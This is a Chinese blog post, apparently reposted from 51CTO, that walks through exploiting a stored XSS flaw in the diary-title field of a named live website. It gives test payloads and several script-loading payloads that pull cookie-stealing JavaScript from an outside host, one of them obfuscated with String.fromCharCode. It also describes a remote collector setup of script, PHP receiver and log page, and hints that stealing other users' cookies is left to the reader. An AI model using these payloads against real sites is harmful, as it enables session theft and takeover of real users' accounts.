XSS漏洞实例利用

简介:

环境:

        window 7 64位一台

        火狐浏览器就位

        外网云服务器一枚(我自己买的...)

        可XSS网站一匹

        获取Cookie的JS代码一套

        

好了,以上就是需要准备的东西,没有的外网云服务器(外网IP)的可以百度一下XSS利用的公开平台,自己研究下怎么用(我的服务器就不公开了,太渣了,只是用来做实验没法公开...)


现在我们开始一步一步的进行XSS漏洞利用


0x00  ....biubiubiu....偶遇可X的站点

(这里就把站点公开了,同学们可以自己学习测试下,请不要搞破坏,防止从 ```XSS入门到派出所```)

1
2
#需要注册一个账号,可X点位于写日记部分
http: //www.vbao100.com/


0x01 开始测试是否存在可X(正常思路啊)

1
2
3
4
#经典测试代码
<script>alert(1)</script>
#猥琐版测试代码(需要在火狐插件firebug中查看隐蔽性好不易被管理员发现相对弹窗)
console.log(1)


0x02 啊啊啊...弹窗了(确定存在XSS)

在写日记的标题处插入测试代码点击预览(表(不要)发布...发布了管理员会审核)

wKiom1eLVEfwlhuPAAC8ee5E7fY264.png-wh_50


0x03 确定存在XSS了...可以利用了...嘿嘿嘿....

再次说一下上次说到的XSS paylaod

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<script src= 'http://b.ioio.pub/xss/probe.js' </script>
 
<img src=x
onerror= "s=createElement('script');body.appendChild(s);s.src='http://
b.ioio.pub/xss/probe.js'" ;>
 
<svg onload=s=createElement( 'script' );body.appendChild(s);s.src='http: //
b.ioio.pub/xss/probe.js>
 
<svg onload=
eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,
101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,9
7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,
99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,
47,120,115,115,47,112,114,111,98,101,46,106,115)) >

当触发以上某一个标签会从远程加载JS代码,这是你可用通过修改远程的JS代码来实现不同的功能。

大家也看到上面的连接那肯定不是我的呀....来自大神的JS获取COOKIE 的代码

分享一下:

1
https: //github.com/evilcos/xssprobe

主要包含三个文件,在这里给大家说下这三个脚本是干什么用的就不具体介绍代码含义了。

第一个:

1
2
3
4
5
这个脚本就是需要远程加载的JS获取Cookie的代码(可以下载一下放到自己的服务器上或XSS平台)
里面有一段需要修改的地方
http_server = "
 
#  这段需要修改为自己服务器的地址和接受数据的PHP文件

第二个:

1
2
这个就是上面提到的需要接受数据的PHP文件这个文件不需要修改。
其作用是将接受的数据写入到第三个文件中。

第三个:

1
2
这是就是你获取cookie后显示cookie的地方。通过第一文件获取到cookie然后传个第二个文件由第二个
文件写入到这个文件中显示出来。

0x04 开始利用了...构造利用代码

1
<script src= 'http://xx.xx.xx.xx/xsstest.js'  /> (xx.xx.xx.xx就是我的云服务器)

构造好了,然后测试一下成功否....测试我自己申请的账号了....(怎么获取别人的cookie就靠你自己想了,你要私信我就告诉你....)

ok...现在看一下效果图....


wKiom1eLWyWTW_PsAAHLMOtU7Vo311.png-wh_50

现在我们就成功获取到我自己的Cookie了....O(∩_∩)O~

(再次申明,请同学们不要搞破坏,仅供测试使用......)




本文转自 nw01f 51CTO博客,原文链接:http://blog.51cto.com/dearch/1827201,如需转载请自行联系原作者

相关文章
|
7月前
|
存储 JavaScript 安全
Web渗透-XSS漏洞深入及xss-labs靶场实战
XSS(跨站脚本攻击)是常见的Web安全漏洞,通过在网页中注入恶意脚本,窃取用户信息或执行非法操作。本文介绍其原理、分类(反射型、存储型、DOM型)、测试方法及xss-labs靶场实战案例,帮助理解与防御XSS攻击。
2381 1
Web渗透-XSS漏洞深入及xss-labs靶场实战
|
安全 JavaScript 前端开发
阿里云先知安全沙龙(西安站) ——浅谈XSS漏洞挖掘与构造思路
本文介绍了DOM-XSS构造、运算符的威力和模板字符串妙用三个主题。通过多个实例图解,详细展示了如何利用DOM特性构造XSS攻击、JavaScript运算符在代码中的巧妙应用,以及模板字符串在开发中的灵活运用。这些内容对提升Web安全意识和编程技巧具有重要参考价值。
|
安全 网络安全 数据安全/隐私保护
XSS 漏洞可能会带来哪些危害?
【10月更文挑战第26天】XSS漏洞可能会给网站和用户带来诸多严重危害
|
存储 监控 安全
|
安全 JavaScript 前端开发
XSS漏洞的危害
XSS漏洞的危害
343 1
|
存储 安全 JavaScript
【XSS】XSS漏洞详细指南
【XSS】XSS漏洞详细指南
806 3
|
存储 JSON 安全
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
2024全网最全面及最新的网络安全技巧 二 之 CSRF+XSS漏洞的各类利用技巧
|
Web App开发 安全 关系型数据库
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
开发框架 安全 JavaScript
xss漏洞原理(四)自动化XSS
xss漏洞原理(四)自动化XSS